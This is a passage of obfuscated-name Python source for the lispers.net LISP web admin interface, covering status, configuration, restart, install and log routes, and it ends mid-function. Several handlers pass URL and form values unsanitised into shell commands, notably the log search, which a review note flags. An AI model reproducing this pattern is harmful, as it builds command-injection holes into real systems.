        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(note)))

    if (xtr not in ["itr", "etr", "rtr"]):
        note = "Invalid URL"
        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(note)))

    show_command = "show {}-keys".format(xtr)
    return(lispconfig.lisp_process_show_command(Ooo, show_command))
if 82 - 82: II111iiii % I11i / OoO0O00 + OoOoOO00 / o0oOOo0O0Ooo / I1Ii111
if 70 - 70: oO0o
if 59 - 59: o0oOOo0O0Ooo % oO0o
if 6 - 6: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 93 - 93: IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
@bottle.route('/lisp/geo-map/<geo_prefix>')
def i1I1i111Ii(geo_prefix):
    '''Serve the geo-map HTML page with $LAT/$LON/$RADIUS substituted from
    the geo-prefix in the URL.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    # URL form uses "-" separators; rebuild the "<coords>/<radius>" syntax.
    pieces = geo_prefix.split("-")
    geo_string = "-".join(pieces[0:-1]) + "/" + pieces[-1]

    geo = lisp.lisp_geo("")
    geo.parse_geo_string(geo_string)
    lat, lon = geo.dms_to_decimal()
    radius_meters = geo.radius * 1000

    handle = open("./lispers.net-geo.html", "r")
    page = handle.read()
    handle.close()
    page = page.replace("$LAT", str(lat))
    page = page.replace("$LON", str(lon))
    page = page.replace("$RADIUS", str(radius_meters))
    return(page)
if 41 - 41: ooOoO0o % OoO0O00 - Oo0Ooo * I1Ii111 * Oo0Ooo
if 69 - 69: OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
@bottle.route('/lisp/login', method="get")
def OOoO0():
    '''Return the HTML login page (GET /lisp/login).'''
    page = lispconfig.lisp_login_page()
    return(page)
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
@bottle.route('/lisp/login', method="post")
def oOoOOo0O():
    '''Handle the login form POST: landing page on success, login page
    otherwise.'''
    authenticated = lispconfig.lisp_validate_user()
    return(lispconfig.lisp_landing_page() if authenticated else OOoO0())
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
@bottle.route('/lisp')
def OoOoo00Ooo00():
    '''Top-level /lisp page: landing page for authenticated users.'''
    if lispconfig.lisp_validate_user():
        return(lispconfig.lisp_landing_page())
    return(OOoO0())
if 32 - 32: Ii1I - Oo0Ooo % OoooooooOO . iII111i / IiII + I1IiiI
if 76 - 76: ooOoO0o
if 73 - 73: O0 * iII111i + Ii1I + ooOoO0o
if 40 - 40: II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
@bottle.route('/lisp/traceback')
def iiIiIi():
    '''Display Traceback reports: show the dedicated traceback log if it
    has content, otherwise grep all log files for "Traceback" hits.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    clean = True
    output = ""

    # First choice: a dedicated traceback log file with content.
    if (os.path.exists("./logs/lisp-traceback.log")):
        output = getoutput("cat ./logs/lisp-traceback.log")
        if (output):
            output = output.replace("----------", "<b>----------</b>")
            output = output.replace("\n", "<br>")
            clean = False

    # Fallback: grep every log file for Traceback occurrences.
    if (clean):
        output = ""
        grepped = getoutput("egrep --with-filename Traceback ./logs/*.log")
        for entry in grepped.split("\n"):
            if (entry.find(":") == -1): continue
            fields = entry.split(":")
            if (fields[1] == "0"): continue
            output += "Found Tracebacks in log file {}<br>".format(fields[0])
            clean = False
        output = output[0:-4]  # drop trailing "<br>"

    if (clean):
        output = "No Tracebacks found - a stable system is a happy system"

    return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
@bottle.route('/lisp/show/not-supported')
def oOoO0():
    '''Render the "not supported" page for unimplemented show commands.'''
    if lispconfig.lisp_validate_user():
        return(lispconfig.lisp_not_supported())
    return(OOoO0())
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
@bottle.route('/lisp/show/status')
def I1ii11():
    '''Render the /lisp/show/status page: admin buttons (superuser only),
    version and uptime info, the LISP process list, and a snapshot of
    system resource usage from top(1).'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    output = ""

    # Superusers get the row of administrative action buttons.
    if (lispconfig.lisp_is_user_superuser(None)):
        buttons = [
            lisp.lisp_button("show configuration", "/lisp/show/conf"),
            lisp.lisp_button("show configuration diff", "/lisp/show/diff"),
            lisp.lisp_button("archive configuration", "/lisp/archive/conf"),
            lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify"),
            lisp.lisp_button("log flows", "/lisp/log/flows"),
            lisp.lisp_button("install LISP software", "/lisp/install/image"),
            lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify"),
        ]
        output = "<center>{}{}{}{}{}{}{}</center><hr>".format(*buttons)

    uptime = getoutput("uptime")
    uname = getoutput("uname -pv")
    version = lisp.lisp_version.replace("+", "")

    cpu_count = multiprocessing.cpu_count()

    # Trim the load averages off the uptime line.
    uptime = uptime[0:uptime.find(", load")]
    lisp_uptime = lisp.lisp_print_elapsed(lisp.lisp_uptime)

    resources = "Not available"

    # List the running LISP python processes.
    ps_cmd = "ps auww" if lisp.lisp_is_macos() else "ps aux"
    ps_filter = "egrep 'PID|python lisp|python -O lisp|python3.8 -O lisp'"
    ps_filter += "| egrep -v grep"
    procs = getoutput("{} | {}".format(ps_cmd, ps_filter))
    procs = procs.replace(" ", lisp.space(1))
    procs = procs.replace("\n", "<br>")

    if (uname.find("Darwin") != -1):
        # macOS reports hyperthreads; halve to get physical cores.
        cpu_count = old_div(cpu_count, 2)
        resources = getoutput("top -l 1 | head -50")
        resources = resources.split("PID")[0]

        # Insert HTML line-breaks before each top(1) section heading.
        idx = resources.find("Load Avg")
        cut = resources[0:idx].find("threads")
        resources = resources[0:cut + 7] + "<br>" + resources[idx::]
        for marker in ("CPU usage", "SharedLibs:", "MemRegions", "PhysMem",
            "VM:", "Networks", "Disks"):
            idx = resources.find(marker)
            resources = resources[0:idx] + "<br>" + resources[idx::]
    else:
        top_out = getoutput("top -b -n 1 | head -50")
        top_out = top_out.split("PID")
        top_out[1] = top_out[1].replace(" ", lisp.space(1))
        resources = (top_out[0] + top_out[1]).replace("\n", "<br>")

    notes = getoutput("cat release-notes.txt").replace("\n", "<br>")

    # NOTE(review): o0oO0 is presumably a module-level build-date string
    # defined elsewhere in this file — confirm against the full source.
    output += '''
    <br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
    <tr>
    <td width="20%"><i>LISP Subsystem Version:<br>
    LISP Release {} Build Date:</i></td>
    <td width="80%"><font face="Courier New">{}<br>
    {}</font></td>
    </tr>
    <tr>
    <td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
    <td width="80%"><font face="Courier New">{}<br>
    {}</font></td>
    </tr>
    <tr>
    <td width="20%"><i>System Architecture:<br>
    Number of CPUs:<font face="Courier New">{}{}</font></td>
    <td width="80%"><font face="Courier New">{}</font></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>LISP Process Status:</i></td>
    <td width="80%">
    <div style="height: 100px; overflow: auto">
    <font size="2" face="Courier New">{}</font></div></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>System Resource Utilization:</i></td>
    <td width="80%">
    <div style="height: 200px; overflow: auto">
    <font face="Courier New">{}</font></td>
    </tr>
    <tr>
    <td width="20%" valign="top"><i>Release Notes:</i></td>
    <td width="80%">
    <div style="height: 300px; overflow: auto">
    <font size="2" face="Courier New">{}</font></div></td>
    </tr>
    </table>
    '''.format(version, lisp.lisp_version, o0oO0, lisp_uptime,
        uptime, lisp.lisp_space(1), cpu_count, uname, procs, resources,
        notes)

    return(lispconfig.lisp_show_wrapper(output))
if 69 - 69: I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
@bottle.route('/lisp/show/conf')
def iI1iIIIi1i():
    '''Serve the running configuration file as plain text.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())
    return(bottle.static_file("lisp.config", root="./",
        mimetype="text/plain"))
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
@bottle.route('/lisp/show/diff')
def IiII1II11I():
    '''Serve the configuration diff file as plain text.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())
    return(bottle.static_file("lisp.config.diff", root="./",
        mimetype="text/plain"))
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
@bottle.route('/lisp/archive/conf')
def i11i1iiI1i():
    '''Copy lisp.config to lisp.config.archive under the IPC lock.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    # Hold the lock so we do not archive a half-written config file.
    lisp.lisp_ipc_lock.acquire()
    os.system("cp ./lisp.config ./lisp.config.archive")
    lisp.lisp_ipc_lock.release()

    message = lisp.lisp_print_sans("Configuration file saved to ")
    message += lisp.lisp_print_cour("./lisp.config.archive")
    return(lispconfig.lisp_show_wrapper(message))
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
@bottle.route('/lisp/clear/conf')
def iI11I():
    '''Back up the configuration file, then clear it under the IPC lock.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    os.system("cp ./lisp.config ./lisp.config.before-clear")
    lisp.lisp_ipc_lock.acquire()
    O0O0oOOo0O()
    lisp.lisp_ipc_lock.release()

    message = lisp.lisp_print_sans(
        "Configuration cleared, a backup copy is stored in ")
    message += lisp.lisp_print_cour("./lisp.config.before-clear")
    return(lispconfig.lisp_show_wrapper(message))
if 19 - 19: iIii1I11I1II1
if 26 - 26: OoooooooOO % I1IiiI % Oo0Ooo . I1IiiI % Ii1I
if 34 - 34: IiII / OoOoOO00
if 87 - 87: O0 * o0oOOo0O0Ooo * Oo0Ooo * II111iiii
if 6 - 6: i1IIi . I1ii11iIi11i + OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
@bottle.route('/lisp/clear/conf/verify')
def ii1Ii1IiIIi():
    '''Ask the user to confirm clearing the configuration.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to clear the configuration?")
    yes_button = lisp.lisp_button("yes", "/lisp/clear/conf")
    cancel_button = lisp.lisp_button("cancel", "/lisp")
    page = prompt + yes_button + cancel_button + "<br>"
    return(lispconfig.lisp_show_wrapper(page))
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
if 21 - 21: i11iIiiIii / i1IIi + I1IiiI * OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
def Oo0oOooo000OO():
    '''Return the port argument ("443", "-8080", or "8080") that the
    running lisp-core.pyo process was started with, or "" if none found.'''
    found = ""
    for port in ["443", "-8080", "8080"]:
        cmd = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(
            port)
        out = getoutput(cmd)
        if (out == ""): continue

        fields = out.split("\n")[0].split(" ")
        if (fields[-2] == "lisp-core.pyo" and fields[-1] == port):
            found = port
        # NOTE(review): the original breaks on the first port with any
        # matching ps output, even when the trailing-argument check fails —
        # behavior preserved.
        break
    return(found)
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
@bottle.route('/lisp/restart')
def OO000o00():
    '''Restart the LISP subsystem by spawning the RESTART-LISP script in a
    background thread.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    # sudo must work non-interactively; refuse if 'requiretty' is set.
    sudoers = getoutput("egrep requiretty /etc/sudoers").split(" ")
    if (sudoers[-1] == "requiretty" and sudoers[0] == "Defaults"):
        message = lisp.lisp_print_sans(
            "Need to remove 'requiretty' from /etc/sudoers")
        return(lispconfig.lisp_show_wrapper(message))

    lisp.lprint(lisp.bold("LISP subsystem restart request received", False))

    # Restart on whatever port lisp-core is currently using.
    port = Oo0oOooo000OO()
    restart_cmd = "sleep 1; sudo ./RESTART-LISP {}".format(port)
    threading.Thread(target=Ii1Iii111IiI1, args=[restart_cmd]).start()

    message = lisp.lisp_print_sans("Restarting LISP subsystem ...")
    return(lispconfig.lisp_show_wrapper(message))
if 56 - 56: II111iiii / oO0o + i11iIiiIii + OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
def Ii1Iii111IiI1(command):
    '''Thread entry point: run a shell command (used for restarts).'''
    os.system(command)
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
@bottle.route('/lisp/restart/verify')
def II1II1():
    '''Ask the user to confirm restarting the LISP subsystem.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to restart the LISP subsystem?")
    yes_button = lisp.lisp_button("yes", "/lisp/restart")
    cancel_button = lisp.lisp_button("cancel", "/lisp")
    page = prompt + yes_button + cancel_button + "<br>"
    return(lispconfig.lisp_show_wrapper(page))
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
@bottle.route('/lisp/install', method="post")
def oooo0OOo():
    '''Download and install the lispers.net software tarball named by the
    "image_url" form field; on success offer a restart button.'''
    if (lispconfig.lisp_validate_user() == False):
        return(OOoO0())

    url = bottle.request.forms.get("image_url")

    # Only lispers.net .tgz images are acceptable.
    if (url.find("lispers.net") == -1 or url.find(".tgz") == -1):
        lisp.lprint(lisp.bold(
            "Invalid install request for file {}".format(url), False))
        message = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
        return(lispconfig.lisp_show_wrapper(message))

    # Pick the interpreter / bytecode suffix matching the running python.
    if (lisp.lisp_is_python2()):
        interp = "python -O "
        suffix = "pyo"
    if (lisp.lisp_is_python3()):
        interp = "python3.8 -O "
        suffix = "pyc"

    if (lisp.lisp_is_ubuntu()):
        cmd = "{} lisp-get-bits.{} {} force 2>&1 > /dev/null".format(interp,
            suffix, url)
    else:
        cmd = "{} lisp-get-bits.{} {} force >& /dev/null".format(interp,
            suffix, url)

    status = os.system(cmd)

    # The downloaded tarball lands in the current directory on success.
    tarball = url.split("/")[-1]
    if (os.path.exists(tarball)):
        release = url.split("release-")[1]
        release = release.split(".tgz")[0]

        message = lisp.lisp_print_sans(
            "Install completed for release {}".format(release))
        message += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
            "/lisp/restart/verify") + "<br>"
    else:
        message = lisp.lisp_print_sans(
            "Install failed for file {}".format(lisp.lisp_print_cour(url)))

    lisp.lprint(lisp.bold("Install request for file {} {}".format(url,
        "succeeded" if (status == 0) else "failed"), False))
    return(lispconfig.lisp_show_wrapper(message))
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo - OoooooooOO % OOooOOo * OoOoOO00
if 69 - 69: i1IIi
if 59 - 59: II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
@bottle.route('/lisp/install/image')
def ooO00O00oOO():
    """Web handler: render the form for entering a lispers.net tarball URL.

    The form posts the "image_url" field to /lisp/install.  Unauthenticated
    sessions are redirected to the login page.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    prompt = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
    page = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>'''.format(prompt)

    return lispconfig.lisp_show_wrapper(page)
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
if 17 - 17: O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
@bottle.route('/lisp/log/flows')
def IIIIIiII1():
    """Web handler: request a dump of current flow data.

    Touches ./log-flows (the signal file the flow logger watches) and
    returns a page linking to logs/lisp-flows.log.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    os.system("touch ./log-flows")

    page = lisp.lisp_print_sans("Flow data appended to file ")
    link = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
    page += lisp.lisp_print_cour(link)
    return lispconfig.lisp_show_wrapper(page)
if 43 - 43: I1Ii111 % iII111i
if 69 - 69: iII111i % OoO0O00
if 86 - 86: oO0o / oO0o
if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def oo00ooOoo(name="", num="", keyword=""):
    """Web handler: keyword-search the tail of a log file.

    Greps the last <num> lines of logs/<name>.log for <keyword> with 10
    lines of context around each match and renders the result with every
    occurrence of the keyword highlighted.

    NOTE(review): name/num/keyword come straight from the URL and are
    interpolated into a shell command -- shell-injection risk; should be
    validated or quoted (e.g. shlex.quote) by the caller chain.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    command = "tail -n {} logs/{}.log | egrep -B10 -A10 {}".format(num, name,
        keyword)
    output = getoutput(command)

    if output:
        occurrences = output.count(keyword)
        output = lisp.convert_font(output)
        output = output.replace("--\n--\n", "--\n")
        output = output.replace("\n", "<br>")
        output = output.replace("--<br>", "<hr>")
        output = "Found <b>{}</b> occurences<hr>".format(occurrences) + output
    else:
        output = "Keyword {} not found".format(keyword)

    #
    # Highlight each keyword occurrence.  This used to be done in two
    # replace() passes that produced improperly nested markup
    # ("<b>kw</font></b>"); a single pass emits well-formed HTML.
    #
    highlighted = "<font color='blue'><b>{}</b></font>".format(keyword)
    output = output.replace(keyword, highlighted)

    output = lisp.lisp_print_cour(output)
    return lispconfig.lisp_show_wrapper(output)
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if 83 - 83: O0 . I1IiiI
if 95 - 95: I11i . OoooooooOO - i1IIi - OoooooooOO - OoO0O00 % iIii1I11I1II1
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
if 100 - 100: Ii1I + OoO0O00
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
@bottle.post('/lisp/search/log/<name>/<num>')
def III1iii1i11iI(name="", num=""):
    """Web handler: accept the keyword-search form and run the search."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    keyword = bottle.request.forms.get("keyword")
    return oo00ooOoo(name, num, keyword)
if 35 - 35: IiII + i1IIi * oO0o - Ii1I . Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
@bottle.route('/lisp/show/log/<name>/<num>')
def Ii(name="", num=""):
    """Web handler: display the tail of logs/<name>.log.

    <num> selects how many trailing lines to show (default 100).  A
    keyword-search form that posts to /lisp/search/log/ is prepended
    when the file exists.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    if num == "":
        num = 100

    search_form = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
'''.format(name, num)

    if os.path.exists("logs/{}.log".format(name)):
        page = getoutput("tail -n {} logs/{}.log".format(num, name))
        page = lisp.convert_font(page)
        page = page.replace("\n", "<br>")
        page = search_form + lisp.lisp_print_cour(page)
    else:
        word_file = lisp.lisp_print_sans("File")
        path = lisp.lisp_print_cour("logs/{}.log".format(name))
        word_missing = lisp.lisp_print_sans("does not exist")
        page = "{} {} {}".format(word_file, path, word_missing)

    return lispconfig.lisp_show_wrapper(page)
if 98 - 98: I1Ii111
if 92 - 92: I1Ii111 - iIii1I11I1II1
if 32 - 32: Ii1I % OoO0O00 * OoO0O00 + IiII * II111iiii * Ii1I
if 11 - 11: oO0o % II111iiii
if 57 - 57: OOooOOo / Oo0Ooo
if 69 - 69: oO0o - Oo0Ooo % IiII
if 50 - 50: OoooooooOO
@bottle.route('/lisp/debug/<name>')
def IiI1i111IiIiIi1(name=""):
    """Web handler: toggle a LISP debug option.

    <name> is "<option>%<value>", or "disable%all" to switch every debug
    option off.  Options live in the "lisp debug" configuration clause,
    except data-plane-logging and flow-logging which live in the
    "lisp xtr-parameters" clause.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    if name == "disable%all":
        #
        # Rewrite the "lisp debug" clause with every option set to "no".
        #
        clause = lispconfig.lisp_get_clause_for_api("lisp debug")
        if "lisp debug" in clause[0]:
            updated = []
            for entry in clause[0]["lisp debug"]:
                option = list(entry.keys())[0]
                updated.append({option: "no"})

            lispconfig.lisp_put_clause_for_api({"lisp debug": updated})

        #
        # Same for the two logging options of "lisp xtr-parameters"; all
        # other parameters keep their current values.
        #
        clause = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
        if "lisp xtr-parameters" in clause[0]:
            updated = []
            for entry in clause[0]["lisp xtr-parameters"]:
                option = list(entry.keys())[0]
                if option in ["data-plane-logging", "flow-logging"]:
                    updated.append({option: "no"})
                else:
                    updated.append({option: entry[option]})

            lispconfig.lisp_put_clause_for_api(
                {"lisp xtr-parameters": updated})

        return lispconfig.lisp_landing_page()

    #
    # Single-option toggle: "<option>%<value>" selects which clause to
    # rewrite, flattening it to a dict before updating the one key.
    #
    parts = name.split("%")
    option = parts[0]
    value = parts[1]

    dataplane_options = ["data-plane-logging", "flow-logging"]

    clause_name = "lisp xtr-parameters" if (option in dataplane_options) \
        else "lisp debug"

    clause = lispconfig.lisp_get_clause_for_api(clause_name)

    if clause_name in clause[0]:
        settings = {}
        for entry in clause[0][clause_name]:
            settings[list(entry.keys())[0]] = list(entry.values())[0]
        if option in settings:
            settings[option] = value

        lispconfig.lisp_put_clause_for_api({clause_name: settings})

    return lispconfig.lisp_landing_page()
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
#
# Web handler: clear a LISP cache or decapsulation-stats counters.  One
# handler serves several routes; the route that matched determines which
# keyword argument is non-empty and therefore which branch runs below.
# The bare "if N - N:" statements are obfuscator filler and are no-ops.
#
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def iiIIi(name="", itr_name='', rtr_name="", etr_name="",
    stats_name=""):
    if 36 - 36: I11i . II111iiii
